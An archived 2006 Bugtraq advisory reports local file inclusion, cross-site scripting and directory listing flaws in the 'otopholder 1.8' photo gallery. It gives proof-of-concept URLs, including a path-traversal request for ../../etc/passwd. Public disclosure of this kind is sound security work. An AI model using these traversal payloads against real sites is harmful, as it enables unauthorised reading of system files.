lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20060815104338.30519.qmail@securityfocus.com> Date: 15 Aug 2006 10:43:38 -0000 From: vampire_chiristof@...oo.com To: bugtraq@...urityfocus.com Subject: otopholder 1.8 suffers from a local file inclusion,XSS and directory listing vuln vendor: http://www.jakeo.com vuln : http://[host]/foto/index.php?path=../../etc/passwd http://[host]/foto/index.php?path=<b>xss</b> http://[host]/foto/index.php?path=../../[directory listing] Author : Vampire Vampire_chiristof@...oo.com Homepage : Www.HackerZ.iR Www.H4ckerZ.Com Iran HackerZ Security Team